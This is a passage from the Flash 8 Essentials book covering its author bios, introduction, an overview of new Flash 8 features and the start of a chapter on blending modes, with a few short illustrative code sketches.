developed many Flash games, including The Black Knight for Arcade Town, Domino Dementia at, and "W.R.A.X." at. He's the founder of, and currently runs this Flash game development community website. Glen's website is.
In addition to his Flash work, Glen also writes and records music with Canadian singer-songwriter Lisa Angela (). Together, their music has had much success, including regular air play on the Oprah Winfrey Show.
Craig Swann is founder of the award-winning interactive agency CRASH!MEDIA (crashmedia.com).
Craig has been working in the online space since 1995 and has been a
core part of the Flash community since its inception. As an educator,
curator, speaker, and writer on new media technologies, Craig has given
20 international talks on Flash, written and contributed to 7 Flash
books, and curated over a dozen new media events featuring some of the
world's brightest Flash and interactive developers. His Flash work at
CRASH! has received over a dozen awards and has been featured in both
print and television. Craig's interactive audio work has developed into
the multi-award-winning online music application Looplabs.com,
which has been used by such clients as Coca-Cola, Miller, Bacardi,
Calvin Klein, Toyota, Sony, and others. When not plugged into the
matrix, Craig enjoys travelling the world and questioning everything.
Certified Macromedia master instructor, Team
Macromedia member, internationally published author, and active
Flash/Flex community participant, Matt Voerman has
been using Flash since its inception as FutureSplash. He has over ten
years' professional web and multimedia industry experience, and has
worked with national digital marketing agencies, state government
departments, and international finance sector clients. Based out of
Perth, Australia, Matt has worked with Macromedia on a number of
levels, most recently as a subject matter expert (SME), helping to
develop the official Macromedia Flash Developer Certification Exam.
Todd Yard is currently a Flash developer at
Brightcove in Cambridge, Massachusetts, where he moved early in 2005 in
the middle of a blizzard. Previously, he was in New York City, working
with EGO7 on its Flash content management system and community
software. He has contributed to a number of friends of ED books, of
which his favorites were Flash MX Studio and Flash MX Application and Interface Design, though he feels the most useful was Extending Flash MX 2004: Complete Guide and Reference to JavaScript Flash. His personal site (which he used to update all the time, he fondly remembers) is.
About the Technical Reviewer
Marco Casario is currently one of the most dynamic
developers in the Macromedia world. A Certified Flex Instructor and
Certified Flash and Dreamweaver Professional, he collaborates with
Macromedia Italy as a speaker and promoter for several events and
conferences, in addition to developing challenging rich Internet
applications himself.
A Flash Lite evangelist, he has also founded a Flash Lite Yahoo Group () and often deals with this new mobile technology on his blog pages at.
Marco recently founded Comtaste (), a company dedicated to exploring new frontiers in the rich Internet and mobile applications fields.
Introduction
Overview
Hello, and welcome to Flash 8 Essentials,
the result of a collaboration between friends of ED and some of the
most talented Flash developers in the world today. It's been a long,
hard road getting here, but we've done it, and we're very proud of our
creation. We designed this book to serve a number of purposes. It's an
essential guide to all of the great new features available in Flash 8,
it's a reference guide for you to look up all those fiddly details, and
it's also a gallery of inspirational examples to help you go further in
your work, allowing you to create more beautiful, breathtaking designs
and more usable applications.
As you've no doubt realized if you've started to
experiment with Flash 8, Flash has come a very long way since the days
of Flash 3 and 4. Some of you will remember even earlier than that.
(Remember what Flash was like before ActionScript? OK, let's not go
there …)
This book is broken down into ten chapters and an
appendix. Each chapter deals with a different new area of Flash 8,
getting you up to speed as quickly as possible with the new features,
using a combination of easy-to-follow tutorials, reference material,
and inspirational examples. The appendix is a gallery of
fully-functional examples—some of the stuff is touched upon in previous
chapters, and some isn't. The chapters are as follows:
In Chapter 1,
Matt Voerman introduces you to the world of Flash 8, summarizing the
new features and setting the scene nicely for the rest of the book.
Chapter 2
sees Craig Swann and Glen Rhodes playing with blend modes—blending
movie clips together for some exciting graphical effects, the likes of
which were previously only available in graphics packages like
Photoshop.
Chapter 3
sees Craig and Glen again take the helm, looking at the all-new filter
effects, another set of functionality that has been borrowed from
graphics packages. Filters allow you to apply effects such as drop
shadows to text or movie clips easily—what previously required a lot
of hard work can now be achieved with a few clicks on the Flash
interface. And there's much more to discover than that, of course.
Todd Yard looks at Flash 8 drawing improvements in Chapter 4, covering Object Drawing mode, gradient enhancements, and much more.
In Chapter 5,
Craig and Glen are back to give you the lowdown on the exciting
advances made with video in Flash 8, all thanks to the new On2 VP6
codec. Coverage includes some exciting ActionScript video manipulation,
and a great game that makes use of the new video alpha channel!
Matt returns to the scene in Chapter 6 to explore Flash 8's TextField improvements, including smoother text using Saffron and text anti-aliasing using both the IDE and ActionScript classes.
In Chapter 7,
friends of ED's very own Chris Mills demonstrates the new Flash 8
performance-enhancing features, including bitmap caching and the Show
Redraw Regions option.
Chapter 8 is the domain of Paul Barnes-Hoggett, who dives deep into the exciting new BitmapData API. He shows you how all the important methods work before following up with some exciting applied examples.
Chapter 9
sees Todd return to present some of his amazing work with the new Flash
8 features—getting creative with filters, masks, and animation. Some of
the effects presented here are easier to achieve using Flash 8 than
previous versions; some were nearly impossible in previous versions!
In Chapter 10, as you get close to the crescendo of the book, Craig and Glen give you an introduction to the ExternalInterface
API, which allows your SWFs to easily and effectively communicate with
host applications written in Java, C#, etc., for some interesting
advanced application development techniques.
Last but certainly not least, Stephen Downs (aka Tink) presents a gallery of inspirational examples in the Appendix, which includes a few features not covered in the rest of the book, such as the FileReference object. He also revisits a plethora of examples introduced earlier, with breathtaking results.
Who This Book Is For
Simple—this book is for anyone with previous
experience in Flash who wants to get up to speed with the new features
introduced in Flash 8 as soon as possible. We won't waste time looking
at timeline basics and tweens, as we think it will be insulting to your
intelligence. We know how anxious you must be to further your knowledge
with a minimum of time investment and get back to your work, fully
harnessing the power of Flash 8. These are busy times for Flash-using
professionals.
Do I Need to Have Flash 8?
In a word, yes. This book won't be much use to
you if you haven't upgraded to Flash 8. If you want to buy this book as
a guide and check out the new features of Flash 8 before you decide to
make that investment, you can always download a 30-day trial version
from.
We would also recommend going for Flash 8 Professional rather than
Flash 8 Basic. While Basic is still a competent product, you'll be
missing out on some of the amazing new features that are only available
in Professional—video alpha channel support, the stand-alone video
encoder, blend modes, and filters, to name just a few. Go to for more information about the new features and their availability in the different versions.
Support for This Book
All the necessary files for this book can be downloaded from. If you run into a problem with any of the instructions, check the errata page for this book at, or post a question in the friends of ED forum at,
and we'll try to help you as quickly as possible. If you post to the
forum, please be as precise as you can about the nature of the problem.
We've made our very best efforts to ensure that all of the content
presented in this book is error free, but mistakes do occasionally slip
through—it's just a sad fact of life. We do apologize in advance for
any you find.
Chapter 1: Flash 8 Overview
by Matt Voerman
Overview
From little things, big things grow. When John
Gay and Robert Tatsumi first developed their computer-illustration tool
SmartSketch back in 1993, they never imagined that 12 years and eight
versions later their humble application would be the tool of choice of
over 1 million rich-media developers worldwide.
SmartSketch went on to be known as FutureSplash, until
its parent company (FutureWave) was bought out by Macromedia in 1996.
Macromedia then changed FutureSplash's name to Flash. Fast-forward to
April 2005, and Adobe Systems announces its intention to purchase
Macromedia in a deal valued at $3.4 billion. Flash, and its global
ubiquity, was one of the main motivators behind Adobe's acquisition of
Macromedia.
Code-named 8Ball during its development phase,
Macromedia Flash 8 has now evolved into the industry standard for
creating (and delivering) web-based rich-media content and applications.
Flash 8 contains a plethora of new features and
functionality, with a large portion of them targeted squarely toward
web designers and animators, as well as video and interactive media
professionals. That's not to say that rich Internet application
developers have been left out in the cold. With its new lightweight,
cross-platform runtime and mobile device authoring features, the Flash
Platform () is still the ideal choice for the development of rich enterprise and mobile: 32][bookmark: ch01lev1sec26E565C1E-70B7-44D0-82B7-BC4CDC351AB9]What's New in Both Versions of Flash 8
In 2004, Macromedia took the step of splitting
Flash into two distinct versions to cater for their wide designer and
developer audience. Flash 8 continues this tradition by creating a
clearer distinction between the two versions with the release of Flash
Basic 8 and Flash Professional 8.
Flash Basic 8 is ideal for web and new-media designers
who have elementary requirements with regard to importing and
manipulating various types of media. Flash Basic 8 designers still gain
access to all of Flash's foundation functionality (including several
new workspace enhancements), but not some of the newer power features
of the latest release.
For designers and developers looking to utilize the
majority of the new feature sets of Flash 8, Flash Professional 8 is
the preferred option. Flash Professional 8 offers a substantial number
of features not found in its sibling's version, such as graphics effect
filters, alpha channel video support, and custom text anti-aliasing.
The following pages outline the new features available in both versions of Flash 8.
Bitmap Caching
Just as web pages are cached in your web browser
to assist with the speedy retrieval of page data, runtime bitmap
caching allows you to specify movie clips or buttons that can be cached
within Flash Player (at runtime) to speed up screen redraw. By
declaring that these symbols be cached as bitmaps, the Flash Player
doesn't have to redraw them constantly from vector data. This provides a significant speed and performance enhancement. Chapter 7 outlines the details of Flash 8's speed improvements.
For example, let's say you've created an animation
that uses a complex physics algorithm to sequentially draw a series of
cubes on the screen. Rather than having to execute the algorithm on a
static cube that has already been rendered to the stage, you can use
runtime bitmap caching to effectively freeze these prerendered cubes.
This ability to freeze a static portion of a symbol that isn't being
updated reduces the number of times Flash Player has to perform a
redraw operation. If a region changes onstage, vector data is used to
update the bitmap cache accordingly.
Bitmap Smoothing
In previous versions of Flash, there was often a
marked difference between the quality of bitmap images viewed in the
authoring environment and those viewed in Flash Player. The new bitmap
smoothing feature addresses this issue by allowing designers to apply
anti-aliasing to imported images so that they render comparably in both
environments. Figures 1-1 and 1-2 demonstrate the bitmap smoothing feature.
Figure 1-1: A bitmap image with smoothing not enabled
Figure 1-2: A bitmap image with smoothing enabled
New Curve Algorithm
The new curve algorithm feature allows designers
to modify the amount of smoothing applied to curves drawn with the
Brush and Pencil tools. Using the new Optimize Curves dialog box (see Figure 1-3),
you can increase (or decrease) the number of points used to calculate a
curve. The downside of this new feature is that using more points
results in larger SWF files. You can choose to apply this feature to a
shape you've drawn by selecting Modify ➤ Shape ➤ Optimize.
Figure 1-3: The new Optimize Curves feature
Gradient Enhancements
The gradient enhancements within Flash 8 allow
you to add up to 16 colors to a gradient, as well as use a bitmap as a
gradient fill.
A gradient focal point feature has also been added to
Flash 8 to give designers greater control over the direction and focal
point of their gradients. Using the Fill Transform tool, you simply
drag the focal point of the gradient from the outside of the object
you're filling to manipulate how the gradient is rendered within your
object.
Flash 8 also allows you to lock a bitmap or gradient
fill to give the impression that the fill extends over the entire
stage. New objects that are painted with the locked gradient fill
appear as masks that reveal the underlying gradient or bitmap. (See Figure 1-4.)
Figure 1-4: Enhanced gradients, including the new gradient focal point
Object Drawing Model
In previous versions of Flash, when you used the
Brush, Line, Oval, Pencil, or Rectangle tool to draw an intersecting
line (or shape) across another line (or shape), the overlapping objects
would be divided into segments at the point of intersection. Then,
using the Selection tool, you could select, move, or manipulate each
segment individually. This mode of illustration is known as
the Merge Drawing model (see Figure 1-5).
Figure 1-5: The traditional Merge Drawing model
Flash 8 introduces the Object Drawing model, which
allows designers to create shapes and lines directly on the stage as
separate objects. So, unlike the Merge Drawing model, these new shapes
and lines don't interfere with other pre-existing shapes on the stage
(see Figure 1-6).
This allows you to safely overlay objects that are on the same layer
without fear of merging or dissecting parts of other objects on the
stage. Activating Object Drawing is as simple as clicking the Object Drawing button found among the options for each tool in the Tools panel.
Figure 1-6: The new Object Drawing model, in which shapes maintain their forms when overlaid
Flash 8's drawing enhancements are covered in more detail in Chapter 4 of this book.
Oval and Rectangle Tool Settings
To assist designers with common illustration
tasks such as specifying the dimensions of frequently drawn objects,
Macromedia has introduced a new dialog box, Rectangle Settings (see Figure 1-7), that allows designers to specify the width and height of ovals and rectangles, as well as the corner radius of rectangles.
Figure 1-7: The new Oval and Rectangle tool settings
Return of Normal Mode Scripting
When Macromedia removed Normal Mode scripting
from Flash MX 2004, there was an outcry from the design community. Many
designers who weren't familiar with ActionScript syntax relied heavily
on Normal Mode scripting to add interactivity to their Flash content.
Thankfully, Macromedia believes in listening to its
users, and it has returned Normal Mode scripting to Flash 8, but this
time under the moniker of Script Assist.
Essentially, Script Assist is identical to Normal Mode
scripting, but with a few enhancements. Script Assist allows you to
search and replace text, view script line numbers, and save a script in
the Script pane when you click away from the object or frame (this is
known as pinning). You can also use the Jump menu to go to any script on any object in the current frame. You can select and deselect Script Assist by clicking the Script Assist button on the Actions panel (see Figure 1-8).
Figure 1-8: Normal Mode scripting returns under the moniker of Script Assist.
Improved Strokes
Flash 8 has improved the way in which designers
can work with paths and strokes. No longer are you subjected to dealing
with only one type of path end (cap); you now have the option of using
either rounded or square caps.
Joins (i.e., the points at which two paths meet) have
also received a makeover, with designers now having the choice of using
either Bevel, Miter, or Round joins (see Figure 1-9). These are chosen from the Join drop-down menu, found sitting proudly on the Property Inspector.
Figure 1-9: New stroke joins
Strokes can now be colored using a gradient, and their maximum size has been increased from 10 to 200 pixels.
TextField Improvements
Macromedia has made some significant improvements
to the way Flash renders text (both in the authoring environment and
within Flash Player).
New Saffron text-rendering technology has been licensed
from Mitsubishi Electric Research Labs and integrated into Flash Player
8. Saffron greatly improves the quality of the rendering of small font
sizes.
Historically, text that was rendered within the Flash
authoring environment has varied considerably from that rendered within
Flash Player. Flash 8's new WYSIWYG text anti-aliasing feature ensures
that what you see in the authoring environment is what you get in Flash
Player.
In addition to this, Flash 8 now facilitates the
anti-aliasing of text based on the specific end-viewing environment.
For example, a line of animated text would have different anti-aliasing
requirements than a large block of static text with a small font size.
If you use the Anti-alias for animation text option, the alignment and kerning information is ignored and the text is rendered as smoothly as possible.
TextField improvements are covered in much more detail in Chapter 6 of this book.
Security Enhancements
Security of Flash Player and the SWF format has
always been paramount for Macromedia. This view has been further
consolidated in Flash 8 with the release of a new Local or Network
Security model. The new model helps prevent SWF files from being used
maliciously to access local file information and transmit that
information over a network.
Contained within the Publish Settings dialog box (accessed via File ➤ Publish Settings),
developers now have the option of specifying either a local or a
network security model for their SWF files. Files that have been
granted network access permission won't be able to access local file
data, and vice versa.
SWF File Metadata
One of the major bugbears developers have had
since Flash's inception was the product's inability to produce SWFs
that could be indexed by search engines such as Google. This was due to
the inability to include embedded metadata within the SWF.
Flash 8 has addressed this issue by adding the
capability to import metadata into SWFs in XML format. This metadata is
based on the RDF (Resource Description Framework; see) and XMP (Extensible Metadata Platform; see) specifications, and is stored within Flash in a W3C-compliant format.
Video Improvements
The encoding and workflow of video within Flash 8
has been substantially enhanced via the introduction of On2's VP6 video
codec. This new codec is part of the core Flash Player upgrade, and it
substantially improves video playback, quality, and encoding. Unlike
Flash Professional, Flash Basic allows only the encoding of embedded
video via the Import Video option. Additionally, encoding to VP6 within Flash Basic is restricted to three presets, none of which can be modified.
Flash 8 video improvements are covered in greater detail in Chapter 5 of this book.
Workspace Enhancements
This section covers all the workspace
enhancements present in Flash 8, added in response to the reams and
reams of valuable feedback given to Macromedia by all you Flash
developers and designers out there. Talk about a community effort!
Exporting Keyboard Shortcuts as HTML
Flash keyboard shortcuts can now be exported as
HTML files that can be viewed and printed using a standard web browser.
This is done by opening the Keyboard Shortcuts dialog box (Edit ➤ Keyboard Shortcuts on the PC, or Flash 8 Professional/Basic ➤ Keyboard Shortcuts on the Mac) and then clicking the Export As HTML button at the top-right corner.
Library Enhancements
The following list describes the enhancements to the Flash Library:
Single library panel: In previous versions of Flash, separate
library panels were required to view the library items of multiple
Flash files. Library panel enhancements in Flash 8 now allow users to
view the library items of multiple Flash files simultaneously in the
same single panel (see Figure 1-10).
Library panel state memory: This was allegedly one of the most
requested enhancements for this version of Flash, but strictly
speaking, this is more a bug-fix than an enhancement. In previous
versions of Flash, when you opened (or closed) library panels in a
document you were working on, and then closed that document, you would
expect the library panels to be in the same place/order/sequence when
you reopened the document again. Alas, this was not the case. This
"undocumented feature" has been addressed, and library panels now
remember the state they were left in.
Drag-and-drop library components: When working with components
in previous versions of Flash, in order to add components to the
library of a Flash file, you first had to place them onto the stage and
then delete them. Flash 8 has addressed this issue, and you can now
place components directly into the library without first having to
place them onto the stage.
Figure 1-10: Multiple document libraries in a single panel
Macintosh Document Tabs
Mac users can now open and easily navigate
through multiple Flash documents within the same window. This is
accomplished via the new Macintosh Document Tabs feature, located at
the top of the workspace (see Figure 1-11).
Figure 1-11: The new Document Tabs feature
Object-based Undo and Redo Commands
Flash 8 users now have the option of tracking
changes from either a document or an object level. Using the
object-based Undo/Redo command lets users undo the changes made to an
object without having to undo changes to other objects (as is the case
with the document-level Undo/Redo option).
Expanded Stage Pasteboard
The pasteboard is the gray region located around
the outside boundary of the stage. Historically, designers have used
this area to place graphics or components they want to include within a
Flash movie, but don't necessarily want to appear onstage during
playback (or want them to appear at a later point in an animation).
Flash 8 has increased the size of the pasteboard, giving designers more
screen real estate to work with.
XML-to-UI Extensibility
Historically, customizing user interfaces (UIs)
so they work across the various operating platforms, such as Windows
and Macintosh, has been a developer's nightmare. To help ease some of
this pain, Netscape's Mozilla project developed XUL (pronounced
"zool"), the XML User Interface Language.
Using a subset of XUL and some custom Flash tags,
XML-to-UI extensibility allows developers to extend and automate the
Flash 8 IDE to perform common and repetitive tasks/actions. These
include behaviors, commands (JavaScript API), effects, and tools.
The XML-to-UI engine works with each of these
extensibility features to create custom modal dialog boxes if the
extension either requires or accepts parameters. The user must dismiss these modal dialog boxes (accepting or canceling) before the application can continue.
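As a rough illustration of the idea, a dialog definition in this XUL-like subset might look something like the following. This is a hypothetical sketch: the tag and attribute names mirror the XUL subset described above, but the exact schema should be checked against the Extending Flash documentation.

```xml
<!-- Hypothetical XML-to-UI dialog sketch; tag and attribute names are
     illustrative of the XUL-like subset, not an exact schema. -->
<dialog id="scaleDialog" title="Scale Selection" buttons="accept, cancel">
  <vbox>
    <label value="Scale factor:"/>
    <textbox id="scaleFactor" value="1.0"/>
  </vbox>
</dialog>
```

When an extension declares parameters this way, the XML-to-UI engine renders the modal dialog and hands the entered values back to the extension once the user accepts it.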
New Flash Professional 8–Specific Features
Flash Professional 8 contains the same feature
set as Flash Basic 8, plus an abundance of new features available
only in the Professional edition.
Blend Modes
Blend modes allow designers to apply compositing effects to objects located on the stage (see Figure 1-12). Compositing
refers to the process of varying (or blending) the color (or
transparency) of an object on one layer with an object located on a
layer below it.
[image: Image from book]
Figure 1-12: The new object blend modes
Designers who are familiar with other graphics
applications such as Photoshop will instantly recognize some of the 14
new blend modes available in Flash Professional 8, which include Multiply, Screen, Overlay, and Difference.
Blend modes are discussed in more detail in Chapter 2 of this book.
Custom Easing Controls
Offering a two-dimensional graph to represent the
start and end points of a tweened animation, Flash Professional 8's new
custom easing controls give designers the ability to precisely
manipulate the rate at which their animations ease in or out. This
helps create more realistic movement within animations.
The best way to get to grips with this new feature is
to experiment! Try creating a simple tween animation such as a bouncing
ball, and compare the old familiar easing controls with the new custom
easing controls. You can access the new controls by clicking the new Edit button found next to the familiar controls, which opens up the screen shown in Figure 1-13. You'll be impressed.
[image: Image from book]
Figure 1-13: The new Custom Ease In/Ease Out controls
Graphics Effects Filters
One of the most heralded new features of Flash
Professional 8 allows designers to apply graphics effects filters—such
as the Drop Shadow, Blur, Glow, Bevel, Gradient Bevel, and Adjust Color
filters—to objects located on the stage.
The filter process is performed by passing the object's
image data through a series of algorithms that filter (and subsequently
render) the data in a predefined way.
Filters can be applied to MovieClips, TextFields, and
button symbols, and are rendered in real time by Flash Player. Filter
effects can be applied either via the Filters tab located in the Properties panel or programmatically via ActionScript.
Filters are covered in more detail in Chapter 3 of this book.
More TextField Enhancements
Along with the new WYSIWYG Anti-alias for readability and Anti-alias for animation options contained within Flash Basic 8, Flash Professional 8 has a Custom anti-alias feature that allows you to customize the sharpness and thickness of your text (see Figure 1-14).
[image: Image from book]
Figure 1-14: The new WYSIWYG text anti-aliasing feature
The Sharpness option determines the degree of smoothness between the text edges and the background, while the Thickness option allows you to tweak the degree of text edge blend with the background.
The anti-aliasing options are also covered in more detail in Chapter 6 of this book.
More Video Improvements
One of the major improvements in Flash 8 is the
turbo-charging of its video tool set. This includes the addition of a
new video codec within Flash Player for greatly optimized playback, and
an improved video encoder for streamlined workflow. The inclusion of
video alpha channel support raises the bar even further, giving
rich-media designers a new level of creative freedom.
These new video features are covered in greater detail in Chapter 5 of this book.
Improved Video Workflow
Flash Professional 8's Video Import Wizard has
been improved to assist designers in importing (and exporting) video in
a variety of formats (such as embedded, progressively downloaded,
streamed, or linked).
The Video Import Wizard also contains an enhanced
library of predesigned video player skins that can be used as playback
shells for your imported videos when they're exported. These skins are
exported as separate SWFs and can be customized to suit your individual
requirements as a designer (see Figure 1-15).
[image: Image from book]
Figure 1-15: Custom skins for FLV controls
Alpha Channel Support
One of the most eagerly awaited features of Flash
Professional 8 is its new video alpha channel support. Using the On2 VP6
video codec, Flash Player 8 now offers support for runtime alpha
channels. This new feature allows designers to import video that has
been captured in front of a blue (or green) screen. Using the new alpha
channel support, this video can then be overlaid on still images or
live video, allowing for multilayered compositing.
For example, imagine you've captured some video footage of a woman, filmed in front of a blue (or green) background (see Figure 1-16).
You then import this video into Flash Professional 8 and overlay it on
a static (or animated) image of a shopping mall. Using the alpha
channel support, you specify the background green color of the first
video as an alpha channel. This effectively renders the green
background (of the woman video) into a transparent background, which in
turn reveals the static image of the shopping mall on the layer below.
Voilà—you've just created the special effect of a woman
hovering through a shopping mall (see Figure 1-17)!
[image: Image from book]
Figure 1-16: A video filmed with a green screen alpha channel
[image: Image from book]
Figure 1-17: The same video, with a shopping mall animation composited into the alpha channel
Embedded Cue Points
Tucked away within the advanced tabs of the new
Video Import Wizard is a feature for adding embedded cue points to your
Flash video (FLV). Cue points are markers that are inserted into your video and can be used to dynamically trigger events during playback.
Cue points come in two flavors: navigation and event.
Navigation cue points can be used for something as simple as a scene
selection menu, whereas event cue points can be used for something more
complex, such as triggering an event to display a separate animation or
on-screen textual definition of an item being discussed within a movie.
See Figure 1-18.
[image: Image from book]
Figure 1-18: The new embedded cue points for video
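The mechanics behind cue points can be sketched in a few lines: they are simply timestamped markers, and during playback every marker whose time has been passed fires once. The following is a conceptual sketch in plain JavaScript, not the Flash API; all names are illustrative.

```javascript
// Conceptual sketch (not the Flash API): cue points are timestamped markers.
// Each call to the returned poller fires every marker whose time has been
// passed since the previous poll.
function makeCuePointDispatcher(cuePoints) {
  // cuePoints: [{ time: seconds, type: "navigation" | "event", name: string }]
  const sorted = cuePoints.slice().sort((a, b) => a.time - b.time);
  let next = 0;
  return function onPlayhead(timeSeconds, onCuePoint) {
    const fired = [];
    while (next < sorted.length && sorted[next].time <= timeSeconds) {
      fired.push(sorted[next]);
      if (onCuePoint) onCuePoint(sorted[next]); // e.g. show a caption, jump scenes
      next++;
    }
    return fired; // cue points triggered by this playhead update
  };
}
```

A navigation cue point might jump the playhead from a scene menu, while an event cue point might display a caption; both reduce to the same marker-firing mechanism above.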
Stand-alone FLV Encoder
Flash Professional 8 ships with an external
FLV video encoder. This stand-alone encoder, which can be installed on
a separate, dedicated PC, provides video professionals who prefer to
work outside the Flash authoring environment with the facility to
encode FLV files.
The stand-alone encoder contains the same features
as the authoring environment encoder, but with the added advantage of
including batch-processing capabilities that allow developers to encode
multiple video files at once.
FLV QuickTime Export Plug-in
Now more than ever, leading third-party video
applications are supporting the FLV format. This is further highlighted
by the release of the FLV QuickTime Export plug-in, which, when used in
conjunction with video applications from companies such as Avid, Adobe,
and Apple, provides FLV export capabilities from within their software.
Advanced Settings for On2 VP6 Video Encoding
To provide designers with increased control over
their video encoding, Flash Professional 8 has a new feature that
allows the manipulation of advanced settings of On2 VP6 video encoding.
Located within the Video Import Wizard, the Advanced Settings
encoding option allows you to modify video encoding elements such as
frame and data rates, keyframe placement, video and audio quality, and
file dimensions.
Flash Mobile Enhancements
Flash Professional 8 contains a new mobile device
emulator to allow developers to test and view their Flash Lite
applications (see Figure 1-19).
Content created for output via either Flash Lite 1.0 or 1.1 can now be
viewed and tested via a series of new device templates that display and
interact with content as they would on the selected phone.
[image: Image from book]
Figure 1-19: Flash Lite mobile emulator
The Flash Lite emulator also generates error and warning messages to help debug your content.
Summary
Despite the fact that Flash 8 may be the last
version of Flash to ship under the Macromedia corporate moniker,
Macromedia has endeavored to deliver the most (design) feature-rich
version of Flash to date. The core of this latest release is (as is the
case with most Macromedia products) built around the features and
functionality requested by the designers and developers who use the
products regularly, and it therefore makes sense that the following
chapters are written by some of the world's best Flashers!
Chapter 2: Blending Modes
by Glen Rhodes and Craig Swann
Overview
Since its introduction as a tool for interactive
development, Flash has been widely used as a creative tool. For online
design, art, and animation, Flash has been adopted by designers and
creative people worldwide to bring their visions to the world via the
Internet. However, the last few iterations of this incredible software
package saw a significant movement into the world of application design
and Rich Internet Application (RIA) development. As Flash grew, it
became geared more towards the developer than the artist, but this is
changing dramatically in Macromedia Flash Basic 8 and Macromedia Flash
Professional 8!
It is clear, as will be demonstrated throughout
this book, that the focus of this version is to return to the roots of
visual design, for both designers and developers alike. You'll find
many incredible advancements in visual display when you explore
Macromedia Flash 8, including Filters, Drawing Improvements, Video, and
the new Image API. But first we'll take a look at blending modes. It's
time, once again, to get visual with Flash!
So, What, Exactly, Are Blending Modes?
Blending modes are used to take pixel color
values from two separate movie clips or buttons and then perform a set
of calculations to create a new hybrid image. This hybrid image is a
result of the calculations made on the two overlapping objects.
If you are familiar with graphic editing programs like
Fireworks or Photoshop, then there is a good chance you have
encountered and used blending modes before in your graphic work. Figure 2-1 is an example of the blending modes available in these applications.
[image: Image from book]
Figure 2-1: Layer palettes in Photoshop and Fireworks
In these applications, blending modes are used between
two images which are found on adjacent layers. Flash, however, has a
completely different approach to stacking images, Sprites, movie clips,
and objects in the authoring environment. Of course, you have the power
to control your structure any way you like and you can easily drop a
single instance of an image or object on its own independent layer.
However, Flash also allows you the opportunity to place multiple
objects on a single layer as well as the ability to attach and
duplicate movie clips dynamically with code (which relies on levels and
not layers). This is an important concept to understand, because with
Flash, blending modes are operated on the movie clip, sprite, or button
found immediately below the movie clip, button, or sprite to which the
blending mode is applied.
It is important to understand that blending modes
can only be applied to movie clips or buttons. Of course, you can use
static or dynamic text, video files, or live camera images, but you
need to ensure that these types of content are embedded into a movie
clip which you can then use to apply blending modes. Also, only the top
or source of the blending needs to be a movie clip. When this movie
clip is blended it will impact whatever is below it, whether it is a
movie clip, text, or symbol on the stage.
Blending Modes Supported by Flash 8
Some blending modes used in other popular imaging applications,
such as "Hue" and "Luminosity", require a color space change and thus
extra processing power, which rules out real-time display in the Flash
environment. For this reason, Flash 8 uses a subset of the most common
and popular blending modes.
Before getting into the nuts and bolts of each of the
available blending modes and the visuals that can be produced with
them, let's quickly get an overview of the sort of blends that we can
access and utilize with Flash 8.
Flash 8-supported blending modes include:
Normal
Darken
Multiply
Lighten
Screen
Overlay
Hard Light
Add
Subtract
Difference
Invert
Layer*
Alpha*
Erase*
* These last three are special blending modes that
you may not be familiar with and that require a different set of
circumstances to use. These will be covered independently later in the
chapter.
The other great thing about the addition of
blending modes in Flash 8 is the ability to access and control them
using both the Flash 8 IDE and the ActionScript API. This allows you to
utilize interesting visual effects, either through direct manipulation
on the stage via the Property Inspector or through ActionScript by
modifying a movie clip's blendMode
property. We'll take a look at the ActionScript method in a little bit.
For now, let's focus on applying blends with the Flash IDE, so that we
can see exactly what these blends look like.
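As a quick preview of the scripted route mentioned above, the assignment pattern looks like this. The sketch below is plain JavaScript mirroring the ECMAScript-style syntax ActionScript 2 shares; the movie clip is a stand-in object, and the mode-string list is drawn from the supported-modes list above (in Flash 8 itself you would assign to a real MovieClip instance).

```javascript
// Stand-in for a MovieClip instance; in Flash 8 this would be a real clip
// on the stage, e.g. sourceMC.blendMode = "multiply";
const sourceMC = { blendMode: "normal" };

// Illustrative helper (not a Flash API) that validates a mode string
// against the supported-modes list before assigning it.
function applyBlend(clip, mode) {
  const supported = [
    "normal", "darken", "multiply", "lighten", "screen", "overlay",
    "hardlight", "add", "subtract", "difference", "invert",
    "layer", "alpha", "erase",
  ];
  if (supported.indexOf(mode) === -1) {
    throw new Error("unsupported blend mode: " + mode);
  }
  clip.blendMode = mode;
}

applyBlend(sourceMC, "multiply"); // sourceMC.blendMode is now "multiply"
```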
Applying Blends Using the Flash 8 IDE
In Flash 8, the Property Inspector has been
overhauled, allowing for a whole range of new visual options and
parameters, and including Blends and Filters (which we will cover in
the following chapter). You can now directly apply blends to movie
clips with the newly added Blend drop-down menu, accessible in the Property Inspector and shown in Figure 2-2.
[image: Image from book]
Figure 2-2: Blending modes can now be applied directly to a movie clip using the Property Inspector.
To help you understand the impact that blending modes
have on images, we'll go through each of the possible modes and
describe how the blending mode works, as well as demonstrate each with
an example. If you are going through this book with your computer
nearby, you can open the BlendingModes.fla file
and work through these examples in real time. If, however, you are
enjoying a sunny day and sitting in a park learning about the wonders
of Flash 8—sigh—lucky you. You can easily follow along without a
computer and see what these new blends hold in store for you.
If you are super anxious to see blending modes in
action, you can skip down to the Applying blends using ActionScript
section. You can also download the BlendingModesAS.fla file, which allows you to dynamically swap blending modes to quickly see the new power in visual expression using blending.
But let's start at the beginning. Opening the BlendingModes.fla
file will reveal a simple Timeline architecture with two layers. Two
image movie clips have already been created and placed on their own
layers, so you can immediately start playing with blending. You'll
notice that the top layer and subsequent movie clip are labeled sourceMC, and the bottom layer and movie clip are correspondingly labeled destinationMC. Since blending modes are applied in a top-down fashion, it is the pixel information of the sourceMC that will be applied to the destinationMC. For those free from the chains of a computer, you can see the sourceMC and destinationMC being used in the examples shown in Figure 2-3.
[image: Image from book]
Figure 2-3: The sourceMC and destinationMC images used for the following blending examples
Normal Mode
When accessing the Blend drop-down menu (see Figure 2-2) in the General
tab of the Property Inspector, the default mode will always be Normal.
This mode does not mix or combine pixels of the source image with the
destination image in any way. Thus, in normal blending mode, if you
test the BlendingModes.fla file, you will generate the image shown in Figure 2-4.
[image: Image from book]
Figure 2-4: BlendingModes.fla output with sourceMC set to Normal. No pixels are combined.
Darken Mode
This mode is used to punch through the darker
colors in the source image onto the destination image. When performing
the Darken blending mode, pixel colors from both sourceMC and destinationMC are compared and only the values in the sourceMC that are darker than the pixel in the destinationMC are used in the updated image.
If you change the blending mode of sourceMC in the Property Inspector to Darken you will create the new, combined image shown in Figure 2-5.
[image: Image from book]
Figure 2-5: Affected image when Darken blending mode is applied from sourceMC to destinationMC
You can clearly see that the chocolate egg in the sourceMC is now visible (as is the other chocolate goodness) over the church in the destinationMC.
This mode can generate an interesting result when the source image is
black and white or contains high contrast. By now, even if you are not
familiar with blending operations, you should start to see the new
creative possibilities that exist in leveraging assets in Flash to
create wonderful new compositions.
